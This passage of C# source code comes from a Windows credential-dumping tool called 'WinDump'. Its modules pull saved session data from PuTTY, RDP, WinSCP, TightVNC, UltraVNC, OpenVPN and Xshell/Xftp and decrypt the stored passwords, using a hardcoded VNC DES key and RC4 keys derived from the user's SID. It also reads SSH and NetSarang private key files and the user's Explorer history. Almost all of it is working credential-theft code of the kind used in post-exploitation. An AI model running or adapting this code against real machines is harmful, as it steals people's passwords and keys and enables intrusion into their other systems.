429 | 430 | public BlowfishNavicat(byte[] UserKey) 431 | { 432 | 433 | 434 | SubKey = OriginPBox.Clone() as UInt32[]; 435 | SBox = OriginSBox.Clone() as UInt32[,]; 436 | 437 | for (int i = 0; i < 18; ++i) 438 | { 439 | UInt32 temp = 0; 440 | 441 | temp <<= 8; 442 | temp |= UserKey[(i * 4) % UserKey.Length]; 443 | temp <<= 8; 444 | temp |= UserKey[(i * 4 + 1) % UserKey.Length]; 445 | temp <<= 8; 446 | temp |= UserKey[(i * 4 + 2) % UserKey.Length]; 447 | temp <<= 8; 448 | temp |= UserKey[(i * 4 + 3) % UserKey.Length]; 449 | 450 | SubKey[i] ^= temp; 451 | } 452 | 453 | byte[] _temp = new byte[8]; 454 | for (int i = 0; i < 9; ++i) 455 | { 456 | Encrypt(_temp, Endian.Little); 457 | Buffer.BlockCopy(_temp, 0, SubKey, sizeof(UInt32) * 2 * i, 8); 458 | } 459 | 460 | for (int i = 0; i < 4; ++i) 461 | { 462 | for (int j = 0; j < 128; ++j) 463 | { 464 | Encrypt(_temp, Endian.Little); 465 | Buffer.BlockCopy(_temp, 0, SBox, 256 * sizeof(UInt32) * i + sizeof(UInt64) * j, sizeof(UInt64)); 466 | } 467 | } 468 | } 469 | } 470 | } 471 | -------------------------------------------------------------------------------- /Cred/OpenVPN.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.IO; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | internal class OpenVPN 10 | { 11 | internal static DataTable GetOpenVPN() 12 | { 13 | var basePath = Environment.ExpandEnvironmentVariables(@"%USERPROFILE%\OpenVPN"); 14 | if (!Directory.Exists(basePath)) { 15 | return null; 16 | } 17 | return Directories.DirDump(Path.Combine(basePath,"config"),true,"*.ovpn",SearchOption.AllDirectories); 18 | } 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Cred/Putty.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | internal class Putty 10 | { 11 | internal static DataTable GetPutty() 12 | { 13 | var dt = new DataTable(); 14 | dt.Columns.Add("Name"); 15 | dt.Columns.Add("Protocol"); 16 | dt.Columns.Add("HostName"); 17 | dt.Columns.Add("PortNumber"); 18 | dt.Columns.Add("SerialLine"); 19 | var basePath = @"Software\SimonTatham"; 20 | using (var key = Registry.CurrentUser.OpenSubKey(basePath, false)) 21 | { 22 | if (key == null) 23 | { 24 | return dt; 25 | } 26 | } 27 | using (var key = Registry.CurrentUser.OpenSubKey(basePath+@"\PuTTY\Sessions", false)) 28 | { 29 | if (key == null) { 30 | return dt; 31 | } 32 | foreach (var name in key.GetSubKeyNames()) 33 | { 34 | using (var subkey = key.OpenSubKey(name)) { 35 | 36 | var proto = subkey.GetValue("Protocol",""); 37 | var host = subkey.GetValue("HostName",""); 38 | var port = subkey.GetValue("PortNumber",""); 39 | var seri = subkey.GetValue("SerialLine",""); 40 | dt.Rows.Add(name,proto,host,port,seri); 41 | } 42 | } 43 | } 44 | return dt; 45 | 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /Cred/RDP.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | internal class RDP 10 | { 11 | internal static DataTable GetRDP() 12 | { 13 | var dt = new DataTable(); 14 | dt.Columns.Add("Name"); 15 | dt.Columns.Add("Username"); 16 | var key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Terminal Server Client\Servers", false); 17 | if (key == null) 18 | { 19 | return dt; 20 | } 21 | foreach (var subkeyname in key.GetSubKeyNames()) 22 | { 23 | using (var subkey = key.OpenSubKey(subkeyname, false)) 24 | { 25 | 26 | var username = subkey.GetValue("UsernameHint", ""); 27 | dt.Rows.Add(subkeyname, username); 28 | 29 | } 30 | } 31 | 32 | return dt; 33 | 34 | } 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /Cred/TightVNC.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.IO; 6 | using System.Security.Cryptography; 7 | using System.Text; 8 | 9 | namespace WinDump 10 | { 11 | internal class TightVNC 12 | { 13 | internal static DataTable GetTightVNC() 14 | { 15 | var dt = new DataTable(); 16 | dt.Columns.Add("Name"); 17 | dt.Columns.Add("Port"); 18 | dt.Columns.Add("Password"); 19 | dt.Columns.Add("ControlPassword"); 20 | dt.Columns.Add("PasswordViewOnly"); 21 | foreach (var root in new RegistryKey[] { Registry.CurrentUser,Registry.LocalMachine }) 22 | { 23 | try 24 | { 25 | using (var key = root.OpenSubKey(@"SOFTWARE\TightVNC\Server")) 26 | { 27 | if (key == null) 28 | { 29 | continue; 30 | } 31 | var name = root.Name; 32 | var port = key.GetValue("RfbPort", 5900).ToString(); 33 | var pwd = key.GetValue("Password", null); 34 | var cpwd = key.GetValue("ControlPassword", null); 35 | var vpwd = key.GetValue("PasswordViewOnly", null); 36 | dt.Rows.Add(name, port, Decrypt(pwd as byte[]), Decrypt(cpwd as byte[]), Decrypt(vpwd as byte[])); 37 | } 38 | } 39 | catch { } 40 | 41 | } 42 | return dt; 43 | } 44 | internal static string Decrypt(byte[] data) 45 | { 46 | if(data == null) 47 | { 48 | return ""; 49 | } 50 | var des = new DESCryptoServiceProvider 51 | { 52 | Mode = CipherMode.ECB, 53 | Padding = PaddingMode.Zeros, 54 | Key = new byte[] { 0xE8, 0x4A, 0xD6, 0x60, 0xC4, 0x72, 0x1A, 0xE0 } 55 | }; 56 | using (var ms = new MemoryStream(data)) 57 | using (CryptoStream cryptoStream = new CryptoStream(ms, des.CreateDecryptor(), CryptoStreamMode.Read)) 58 | using (StreamReader streamReader = new StreamReader(cryptoStream, Encoding.UTF8)) 59 | { 60 | return streamReader.ReadToEnd(); 61 | } 62 | } 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /Cred/UltraVNC.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.IO; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | internal class UltraVNC 10 | { 11 | internal static DataTable GetUltraVNC() 12 | { 13 | DataTable dt = new DataTable(); 14 | dt.Columns.Add("Port"); 15 | dt.Columns.Add("Password"); 16 | dt.Columns.Add("PasswordViewOnly"); 17 | foreach (var loc in Utils.GetAppLocation("UltraVNC")) 18 | { 19 | if (!Directory.Exists(loc)) { 20 | continue; 21 | } 22 | var configPath = Path.Combine(loc, "ultravnc.ini"); 23 | if (!File.Exists(configPath)) { 24 | continue; 25 | } 26 | var config = new IniParser(configPath); 27 | var epwd = Utils.FromHex(config.GetValue("ultravnc", "passwd")); 28 | var epwd2 = Utils.FromHex(config.GetValue("ultravnc", "passwd2")); 29 | var port = config.GetValue("admin", "PortNumber") ?? "5900"; 30 | var pwd = ""; 31 | if (epwd != null) 32 | { 33 | Array.Resize(ref epwd, 8); 34 | pwd = TightVNC.Decrypt(epwd); 35 | } 36 | var pwd2 = ""; 37 | if (epwd2 != null) 38 | { 39 | Array.Resize(ref epwd2, 8); 40 | pwd2 = TightVNC.Decrypt(epwd2); 41 | } 42 | dt.Rows.Add(port,pwd,pwd2); 43 | } 44 | return dt; 45 | } 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /Cred/WinSCP.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.IO; 6 | using System.Runtime.Remoting.Messaging; 7 | using System.Text; 8 | 9 | namespace WinDump 10 | { 11 | internal class WinSCP 12 | { 13 | internal static DataTable GetWinSCP() 14 | { 15 | DataTable dt = new DataTable(); 16 | dt.Columns.Add("Name"); 17 | dt.Columns.Add("Host"); 18 | dt.Columns.Add("Port"); 19 | dt.Columns.Add("User"); 20 | dt.Columns.Add("Pass"); 21 | dt.Columns.Add("Key"); 22 | var basePath = @"Software\Martin Prikryl"; 23 | using (var key = Registry.CurrentUser.OpenSubKey(basePath, false)) 24 | { 25 | if (key == null) 26 | { 27 | return dt; 28 | } 29 | } 30 | using (var key = Registry.CurrentUser.OpenSubKey(basePath+@"\WinSCP 2\Sessions", false)) 31 | { 32 | if (key == null) { 33 | return dt; 34 | } 35 | foreach(var subname in key.GetSubKeyNames()) 36 | { 37 | using(var subkey = key.OpenSubKey(subname, false)) 38 | { 39 | 40 | var host = subkey.GetValue("HostName", "").ToString(); 41 | if (host.Length == 0) { 42 | continue; 43 | } 44 | var port = subkey.GetValue("PortNumber", 22); 45 | var user = subkey.GetValue("UserName", "").ToString(); 46 | var pass = subkey.GetValue("Password", "").ToString(); 47 | var keypath = subkey.GetValue("PublicKeyFile", "").ToString(); 48 | if (pass.Length != 0) 49 | { 50 | pass = Decrypt_WinSCP(user, pass, host); 51 | } 52 | var keyContent = ""; 53 | if (keypath.Length != 0) { 54 | keypath = Uri.UnescapeDataString(keypath); 55 | if (File.Exists(keypath)) { 56 | keyContent = File.ReadAllText(keypath); 57 | } 58 | 59 | } 60 | dt.Rows.Add(subname, host, port, user, pass, keyContent); 61 | } 62 | } 63 | return dt; 64 | 65 | } 66 | } 67 | static string Decrypt_WinSCP(string user, string pass, string host) 68 | { 69 | List list = new List(); 70 | for (int i = 0; i < pass.Length; i++) 71 | { 72 | list.Add(pass[i].ToString()); 73 | } 74 | List list2 = new List(); 75 | for (int j = 0; j < list.Count; j++) 76 | { 77 | if (list[j] == "A") 78 | { 79 | list2.Add("10"); 80 | } 81 | if (list[j] == "B") 82 | { 83 | list2.Add("11"); 84 | } 85 | if (list[j] == "C") 86 | { 87 | list2.Add("12"); 88 | } 89 | if (list[j] == "D") 90 | { 91 | list2.Add("13"); 92 | } 93 | if (list[j] == "E") 94 | { 95 | list2.Add("14"); 96 | } 97 | if (list[j] == "F") 98 | { 99 | list2.Add("15"); 100 | } 101 | if ("ABCDEF".IndexOf(list[j]) == -1) 102 | { 103 | list2.Add(list[j]); 104 | } 105 | } 106 | List list3 = list2; 107 | int num = 0; 108 | if (Dec_nex(list3) == 255) 109 | { 110 | list3.Remove(list3[0]); 111 | list3.Remove(list3[0]); 112 | list3.Remove(list3[0]); 113 | list3.Remove(list3[0]); 114 | num = Dec_nex(list3); 115 | } 116 | List list4 = list3; 117 | list4.Remove(list4[0]); 118 | list4.Remove(list4[0]); 119 | int num2 = Dec_nex(list3) * 2; 120 | for (int k = 0; k < num2; k++) 121 | { 122 | list3.Remove(list3[0]); 123 | } 124 | string text = ""; 125 | for (int l = 0; l <= num; l++) 126 | { 127 | string str = ((char)Dec_nex(list3)).ToString(); 128 | list3.Remove(list3[0]); 129 | list3.Remove(list3[0]); 130 | text += str; 131 | } 132 | string text2 = user + host; 133 | int count = text.IndexOf(text2); 134 | text = text.Remove(0, count); 135 | return text.Replace(text2, ""); 136 | } 137 | static int Dec_nex(List list) 138 | { 139 | int num = int.Parse(list[0]); 140 | int num2 = int.Parse(list[1]); 141 | return 255 ^ (((num << 4) + num2 ^ 163) & 255); 142 | } 143 | } 144 | } 145 | -------------------------------------------------------------------------------- /Cred/XManager.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.IO; 5 | using System.Security.Cryptography; 6 | using System.Security.Principal; 7 | using System.Text; 8 | 9 | namespace WinDump 10 | { 11 | internal class XManager 12 | { 13 | internal static WindowsIdentity id = WindowsIdentity.GetCurrent(); 14 | internal static DataTable GetSession() 15 | { 16 | var dt = new DataTable(); 17 | dt.Columns.Add("Name"); 18 | dt.Columns.Add("Proto"); 19 | dt.Columns.Add("Host"); 20 | dt.Columns.Add("Port"); 21 | dt.Columns.Add("User"); 22 | dt.Columns.Add("Password"); 23 | dt.Columns.Add("Key"); 24 | dt.Columns.Add("Passphrase"); 25 | dt.Columns.Add("LastModified"); 26 | dt.Columns.Add("Version"); 27 | string docPath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); 28 | string nsPath = Path.Combine(docPath, "NetSarang Computer"); 29 | if (!Directory.Exists(nsPath)) 30 | { 31 | return dt; 32 | } 33 | // Xshell 34 | foreach(var file in Directory.GetFiles(nsPath, "*.xsh", SearchOption.AllDirectories)) 35 | { 36 | 37 | var ini = new IniParser(file); 38 | var name = Path.GetFileName(file); 39 | var proto = ini.GetValue("CONNECTION", "Protocol"); 40 | var host = ini.GetValue("CONNECTION", "Host"); 41 | var port = ini.GetValue("CONNECTION", "Port"); 42 | var user = ini.GetValue("CONNECTION:AUTHENTICATION", "UserName"); 43 | // 解密pass 44 | var pass = ini.GetValue("CONNECTION:AUTHENTICATION", "Password"); 45 | var key = ini.GetValue("CONNECTION:AUTHENTICATION", "UserKey"); 46 | // 解密phrase 47 | var phrase = ini.GetValue("CONNECTION:AUTHENTICATION", "Passphrase"); 48 | var last = File.GetLastWriteTime(file); 49 | 50 | var version = ini.GetValue("SessionInfo", "Version"); 51 | dt.Rows.Add(name, proto, host, port, user, pass, key, phrase, last, version); 52 | } 53 | // Xftp 54 | foreach (var file in Directory.GetFiles(nsPath, "*.xfp", SearchOption.AllDirectories)) 55 | { 56 | var ini = new IniParser(file); 57 | var name = Path.GetFileName(file); 58 | var proto = ini.GetValue("CONNECTION", "Protocol") == "0" ? "FTP" : "SFTP"; 59 | var host = ini.GetValue("CONNECTION", "Host"); 60 | var port = ini.GetValue("CONNECTION", "Port"); 61 | var user = ini.GetValue("CONNECTION", "UserName"); 62 | // 解密pass 63 | var pass = ini.GetValue("CONNECTION", "Password"); 64 | var key = ini.GetValue("CONNECTION", "UserKey"); 65 | // 解密phrase 66 | var phrase = ini.GetValue("CONNECTION", "UserKeyPassPhrase"); 67 | var last = File.GetLastWriteTime(file); 68 | var version = ini.GetValue("SessionInfo", "Version"); 69 | dt.Rows.Add(name, proto, host, port, user, pass, key, phrase, last, version); 70 | } 71 | // Xstart 72 | foreach (var file in Directory.GetFiles(nsPath, "*.xcas", SearchOption.AllDirectories)) 73 | { 74 | var ini = new IniParser(file); 75 | var name = Path.GetFileName(file); 76 | var proto = ini.GetValue("SESSION", "Protocol") == "0" ? "FTP" : "SFTP"; 77 | var host = ini.GetValue("SESSION", "Host"); 78 | var port = ini.GetValue("SSH", "Port"); 79 | var user = ini.GetValue("SESSION", "UserName"); 80 | // 解密pass 81 | var pass = ini.GetValue("SESSION", "Password"); 82 | var key = ini.GetValue("SSH", "PublicKey"); 83 | // 解密phrase 84 | var phrase = ini.GetValue("SSH", "Passphrase"); 85 | var last = File.GetLastWriteTime(file); 86 | 87 | var version = ini.GetValue("SessionInfo", "Version"); 88 | dt.Rows.Add(name, proto, host, port, user, pass, key, phrase, last, version); 89 | } 90 | // RDP 91 | foreach (var file in Directory.GetFiles(nsPath, "*.xard", SearchOption.AllDirectories)) 92 | { 93 | var ini = new IniParser(file); 94 | var name = Path.GetFileName(file); 95 | var proto = ini.GetValue("GENERAL", "Protocol"); 96 | var host = ini.GetValue("GENERAL", "Host"); 97 | var port = ini.GetValue("GENERAL", "Port"); 98 | var user = ini.GetValue("GENERAL", "UserName"); 99 | // 解密pass 100 | var pass = ini.GetValue("GENERAL", "Password"); 101 | var key = ""; 102 | var phrase = ""; 103 | var last = File.GetLastWriteTime(file); 104 | var version = GetVersionFromPath(file); 105 | 106 | dt.Rows.Add(name, proto, host, port, user, pass, key, phrase, last,version); 107 | } 108 | // VNC 109 | foreach (var file in Directory.GetFiles(nsPath, "*.xvnc", SearchOption.AllDirectories)) 110 | { 111 | var ini = new IniParser(file); 112 | var name = Path.GetFileName(file); 113 | var proto = "VNC"; 114 | var host = ini.GetValue("CONNECTION", "Host"); 115 | var port = ini.GetValue("CONNECTION", "Port"); 116 | var user = ""; 117 | // 解密pass 118 | var pass = ini.GetValue("SESSION", "Password"); 119 | var key = ""; 120 | var phrase = ""; 121 | var last = File.GetLastWriteTime(file); 122 | var version = GetVersionFromPath(file); 123 | dt.Rows.Add(name, proto, host, port, user, pass, key, phrase, last,version); 124 | } 125 | foreach (DataRow row in dt.Rows) { 126 | Decrypt(row); 127 | } 128 | return dt; 129 | } 130 | internal static DataTable GetUserKey() 131 | { 132 | var dt = new DataTable(); 133 | dt.Columns.Add("Name"); 134 | dt.Columns.Add("Content"); 135 | string docPath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); 136 | string nsPath = Path.Combine(docPath, "NetSarang Computer"); 137 | if (!Directory.Exists(nsPath)) 138 | { 139 | return dt; 140 | } 141 | foreach (var file in Directory.GetFiles(nsPath, "*.pri", SearchOption.AllDirectories)) 142 | { 143 | var name = Path.GetFileName(file); 144 | var content = File.ReadAllText(file); 145 | dt.Rows.Add(name, content); 146 | } 147 | return dt; 148 | 149 | } 150 | internal static string GetVersionFromPath(string path) 151 | { 152 | var pos = path.IndexOf("NetSarang Computer"); 153 | if (pos == -1) 154 | { 155 | return ""; 156 | } 157 | var start = pos + 1 + "NetSarang Computer".Length; 158 | var end = path.IndexOf("\\", start); 159 | if (end == -1) 160 | { 161 | return ""; 162 | } 163 | return path.Substring(start, end - start); 164 | 165 | } 166 | internal static byte[] GetKey(string version) 167 | { 168 | byte[] key; 169 | var sid = id.User.ToString(); 170 | var username = Environment.UserName; 171 | if (version[0] < '7') 172 | { 173 | key = Encoding.UTF8.GetBytes(username + sid); 174 | } 175 | else 176 | { 177 | var ca = sid.ToCharArray(); 178 | Array.Reverse(ca); 179 | var rsid = new string(ca); 180 | key = Encoding.UTF8.GetBytes(rsid + username); 181 | } 182 | 183 | return new SHA256Managed().ComputeHash(key); 184 | } 185 | internal static byte[] GetRDPKey() 186 | { 187 | var sid = id.User.ToString(); 188 | var key = Encoding.UTF8.GetBytes(sid); 189 | return new SHA256Managed().ComputeHash(key); 190 | } 191 | internal static void Decrypt(DataRow row) 192 | { 193 | var version = row["Version"].ToString(); 194 | byte[] key; 195 | var isrdp = row["Proto"].ToString() == "RDP"; 196 | if (isrdp) 197 | { 198 | key = GetRDPKey(); 199 | } 200 | else 201 | { 202 | key = GetKey(version); 203 | } 204 | var pwd = row["Password"] as string; 205 | if (pwd !=null && pwd.Length>32 ) { 206 | var data = RC4Decrypt(Convert.FromBase64String(pwd), key); 207 | 208 | if (data.Length > 32) 209 | { 210 | if (isrdp) 211 | { 212 | row["Password"] = Encoding.UTF8.GetString(data, 4, data.Length - 32 - 4); 213 | } 214 | else 215 | { 216 | row["Password"] = Encoding.UTF8.GetString(data, 0, data.Length - 32); 217 | } 218 | } 219 | 220 | 221 | } 222 | var phrase = row["Passphrase"] as string; 223 | if (phrase != null && phrase.Length > 32) 224 | { 225 | var data = RC4Decrypt(Convert.FromBase64String(phrase), key); 226 | if (data.Length > 32) 227 | { 228 | Array.Resize(ref data, data.Length - 32); 229 | row["Passphrase"] = Encoding.UTF8.GetString(data); 230 | } 231 | } 232 | 233 | } 234 | internal static byte[] RC4Decrypt(byte[] data, byte[] pwd) 235 | { 236 | int[] array = new int[256]; 237 | int[] array2 = new int[256]; 238 | byte[] array3 = new byte[data.Length]; 239 | int i; 240 | for (i = 0; i < 256; i++) 241 | { 242 | array[i] = pwd[i % pwd.Length]; 243 | array2[i] = i; 244 | } 245 | int num = i = 0; 246 | for (; i < 256; i++) 247 | { 248 | num = (num + array2[i] + array[i]) % 256; 249 | int num2 = array2[i]; 250 | array2[i] = array2[num]; 251 | array2[num] = num2; 252 | } 253 | int num3 = num = (i = 0); 254 | for (; i < data.Length; i++) 255 | { 256 | num3++; 257 | num3 %= 256; 258 | num += array2[num3]; 259 | num %= 256; 260 | int num2 = array2[num3]; 261 | array2[num3] = array2[num]; 262 | array2[num] = num2; 263 | int num4 = array2[(array2[num3] + array2[num]) % 256]; 264 | array3[i] = (byte)(data[i] ^ num4); 265 | } 266 | return array3; 267 | } 268 | } 269 | 270 | } 271 | -------------------------------------------------------------------------------- /Directories.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.IO; 6 | using System.Reflection; 7 | using System.Text; 8 | using System.Text.RegularExpressions; 9 | 10 | namespace WinDump 11 | { 12 | class Directories 13 | { 14 | internal static DataTable Desktop() 15 | { 16 | return DirDump(@"%USERPROFILE%\Desktop"); 17 | } 18 | internal static DataTable Documents() 19 | { 20 | return DirDump(@"%USERPROFILE%\Documents"); 21 | } 22 | internal static DataTable SSH() 23 | { 24 | var path = Environment.ExpandEnvironmentVariables(@"%USERPROFILE%\.ssh"); 25 | var dt = DirDump(path, true); 26 | var existFile = new Dictionary(); 27 | var configContent = ""; 28 | foreach (DataRow row in dt.Rows) { 29 | var name = row["Name"].ToString(); 30 | if (name != "config") 31 | { 32 | existFile[Path.Combine(path, name)] = true; 33 | } 34 | else 35 | { 36 | configContent = row["Content"].ToString(); 37 | } 38 | } 39 | if (configContent != "") 40 | { 41 | foreach(Match m in new Regex(@"IdentityFile\s+(.*?)\n", RegexOptions.Compiled).Matches(configContent)) 42 | { 43 | var keypath = m.Groups[1].Value.Trim().Replace("~", "%USERPROFILE%").Replace("/", "\\"); 44 | keypath = Environment.ExpandEnvironmentVariables(keypath); 45 | if (existFile.ContainsKey(keypath)) { 46 | continue; 47 | } 48 | if (!File.Exists(keypath)) 49 | { 50 | continue; 51 | } 52 | var fileinfo = new FileInfo(keypath); 53 | 54 | dt.Rows.Add(fileinfo.LastWriteTime,fileinfo.Length,"",fileinfo.FullName,File.ReadAllText(keypath)); 55 | } 56 | } 57 | 58 | return dt; 59 | } 60 | internal static DataTable Recent() 61 | { 62 | return DirDump(@"%APPDATA%\Microsoft\Windows\Recent"); 63 | } 64 | internal static DataTable ExplorerHistory() 65 | { 66 | var dt = new DataTable(); 67 | dt.Columns.Add("Name"); 68 | dt.Columns.Add("Value"); 69 | 70 | using(var key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU", false)) 71 | { 72 | foreach(var name in key.GetValueNames()) 73 | { 74 | var value = key.GetValue(name); 75 | dt.Rows.Add(name,value); 76 | } 77 | } 78 | using (var key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths", false)) 79 | { 80 | foreach (var name in key.GetValueNames()) 81 | { 82 | var value = key.GetValue(name); 83 | dt.Rows.Add(name, value); 84 | } 85 | } 86 | return dt; 87 | } 88 | internal static DataTable Programs() 89 | { 90 | var dt = DirDump(@"%ProgramData%\Microsoft\Windows\Start Menu\Programs"); 91 | var dt2 = DirDump(@"%APPDATA%\Microsoft\Windows\Start Menu\Programs"); 92 | dt.Merge(dt2); 93 | return dt; 94 | } 95 | internal static DataTable DirDump(string path,bool withContent=false,string searchParrten="*",SearchOption searchOption = SearchOption.TopDirectoryOnly) 96 | { 97 | DataTable dt = new DataTable(); 98 | dt.Columns.Add("Date"); 99 | dt.Columns.Add("Size"); 100 | dt.Columns.Add("Link"); 101 | dt.Columns.Add("Name"); 102 | if (withContent) 103 | { 104 | dt.Columns.Add("Content"); 105 | } 106 | 107 | path = Environment.ExpandEnvironmentVariables(path); 108 | if (!Directory.Exists(path)) 109 | { 110 | return dt; 111 | } 112 | DirectoryInfo directoryInfo = new DirectoryInfo(path); 113 | 114 | foreach (var fileInfo in directoryInfo.GetFiles(searchParrten, searchOption)) 115 | { 116 | var target = ""; 117 | if (fileInfo.Extension == ".lnk") 118 | { 119 | try 120 | { 121 | var shortcut = new WinShortcut(fileInfo.FullName); 122 | target = shortcut.TargetPath; 123 | } 124 | catch { } 125 | } 126 | if (withContent) 127 | { 128 | var content = ""; 129 | if (withContent) 130 | { 131 | 132 | content = Files.DumpFile(fileInfo.FullName, out var _); 133 | } 134 | dt.Rows.Add(fileInfo.LastWriteTime, fileInfo.Length, target, fileInfo.Name, content); 135 | } 136 | else 137 | { 138 | dt.Rows.Add(fileInfo.LastWriteTime, fileInfo.Length, target, fileInfo.Name); 139 | } 140 | 141 | 142 | } 143 | if (!withContent) 144 | { 145 | foreach (var subDir in directoryInfo.GetDirectories()) 146 | { 147 | if (withContent) 148 | { 149 | dt.Rows.Add(subDir.LastWriteTime, "DIR", "", subDir.Name, ""); 150 | } 151 | else 152 | { 153 | dt.Rows.Add(subDir.LastWriteTime, "DIR", "", subDir.Name); 154 | } 155 | } 156 | } 157 | return dt; 158 | } 159 | 160 | } 161 | class WinShortcut 162 | { 163 | public class LinkFlags 164 | { 165 | public const int HasLinkTargetIdList = 0x00000001; 166 | public const int HasLinkInfo = 0x00000002; 167 | public const int HasName = 0x00000004; 168 | public const int HasRelativePath = 0x00000008; 169 | public const int HasWorkingDir = 0x00000010; 170 | public const int HasArguments = 0x00000020; 171 | public const int HasIconLocation = 0x00000040; 172 | public const int IsUnicode = 0x00000080; 173 | public const int ForceNoLinkInfo = 0x00000100; 174 | public const int HasExpIcon = 0x00004000; 175 | public const int EnableTargetMetadata = 0x00080000; 176 | } 177 | 178 | public class FileAttributes 179 | { 180 | public const int ReadOnly = 0x0001; 181 | public const int Hidden = 0x0002; 182 | public const int System = 0x0004; 183 | public const int Reserved1 = 0x0008; 184 | public const int Directory = 0x0010; 185 | public const int Archive = 0x0020; 186 | public const int Reserved2 = 0x0040; 187 | public const int Normal = 0x0080; 188 | public const int Temporary = 0x0100; 189 | public const int SparseFile = 0x0200; 190 | public const int ReparsePoint = 0x0400; 191 | public const int Compressed = 0x0800; 192 | public const int Offline = 0x1000; 193 | public const int NotContentIndexed = 0x2000; 194 | public const int Encrypted = 0x4000; 195 | } 196 | public class LinkInfoFlags 197 | { 198 | public const int VolumeIDAndLocalBasePath = 1; 199 | public const int CommonNetworkRelativeLinkAndPathSuffix = 2; 200 | } 201 | 202 | public WinShortcut(string path) 203 | { 204 | using (var istream = File.OpenRead(path)) 205 | { 206 | try 207 | { 208 | this.Parse(istream); 209 | } 210 | catch (Exception ex) 211 | { 212 | throw new Exception("Failed to parse this file as a Windows shortcut", ex); 213 | } 214 | } 215 | } 216 | 217 | /// 218 | /// The real path of target this shortcut refers to. 219 | /// 220 | public string TargetPath { get; private set; } 221 | 222 | /// 223 | /// Whether the target this shortcut refers to is a directory. 224 | /// 225 | public bool IsDirectory { get; private set; } 226 | 227 | private void Parse(Stream istream) 228 | { 229 | var linkFlags = this.ParseHeader(istream); 230 | if ((linkFlags & LinkFlags.HasLinkTargetIdList) == LinkFlags.HasLinkTargetIdList) 231 | { 232 | this.ParseTargetIDList(istream); 233 | } 234 | if ((linkFlags & LinkFlags.HasLinkInfo) == LinkFlags.HasLinkInfo) 235 | { 236 | this.ParseLinkInfo(istream); 237 | } 238 | } 239 | 240 | /// 241 | /// Parse the header. 242 | /// 243 | /// 244 | /// The flags that specify the presence of optional structures 245 | private int ParseHeader(Stream stream) 246 | { 247 | stream.Seek(20, SeekOrigin.Begin);//jump to the LinkFlags part of ShellLinkHeader 248 | var buffer = new byte[4]; 249 | stream.Read(buffer, 0, buffer.Length); 250 | var linkFlags = BitConverter.ToInt32(buffer, 0); 251 | 252 | stream.Read(buffer, 0, buffer.Length);//read next 4 bytes, that is FileAttributes 253 | var fileAttrFlags = BitConverter.ToInt32(buffer, 0); 254 | IsDirectory = (fileAttrFlags & FileAttributes.Directory) == FileAttributes.Directory; 255 | 256 | stream.Seek(36, SeekOrigin.Current);//jump to the HotKey part 257 | stream.Read(buffer, 0, 2); 258 | 259 | return linkFlags; 260 | } 261 | 262 | /// 263 | /// Parse the TargetIDList part. 264 | /// 265 | /// 266 | private void ParseTargetIDList(Stream stream) 267 | { 268 | stream.Seek(76, SeekOrigin.Begin);//jump to the LinkTargetIDList part 269 | var buffer = new byte[2]; 270 | stream.Read(buffer, 0, buffer.Length); 271 | var size = BitConverter.ToInt16(buffer, 0); 272 | //the TargetIDList part isn't used currently, so just move the cursor forward 273 | stream.Seek(size, SeekOrigin.Current); 274 | } 275 | 276 | /// 277 | /// Parse the LinkInfo part. 278 | /// 279 | /// 280 | private void ParseLinkInfo(Stream stream) 281 | { 282 | var start = stream.Position;//save the start position of LinkInfo 283 | stream.Seek(8, SeekOrigin.Current);//jump to the LinkInfoFlags part 284 | var buffer = new byte[4]; 285 | stream.Read(buffer, 0, buffer.Length); 286 | var lnkInfoFlags = BitConverter.ToInt32(buffer, 0); 287 | if ((lnkInfoFlags & LinkInfoFlags.VolumeIDAndLocalBasePath) == LinkInfoFlags.VolumeIDAndLocalBasePath) 288 | { 289 | stream.Seek(4, SeekOrigin.Current); 290 | stream.Read(buffer, 0, buffer.Length); 291 | var localBasePathOffset = BitConverter.ToInt32(buffer, 0); 292 | var basePathOffset = start + localBasePathOffset; 293 | stream.Seek(basePathOffset, SeekOrigin.Begin); 294 | 295 | using (var ms = new MemoryStream()) 296 | { 297 | var b = 0; 298 | //get raw bytes of LocalBasePath 299 | while ((b = stream.ReadByte()) > 0) 300 | ms.WriteByte((byte)b); 301 | 302 | TargetPath = Encoding.Default.GetString(ms.ToArray()); 303 | } 304 | } 305 | } 306 | } 307 | 308 | } 309 | -------------------------------------------------------------------------------- /Files.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Text; 5 | 6 | namespace WinDump 7 | { 8 | internal class Files 9 | { 10 | internal static string DumpFile(string file,out bool ok) 11 | { 12 | try 13 | { 14 | var data = File.ReadAllText(Environment.ExpandEnvironmentVariables(file)); 15 | ok = true; 16 | return data; 17 | } 18 | catch (Exception e) 19 | { 20 | ok = false; 21 | return e.Message; 22 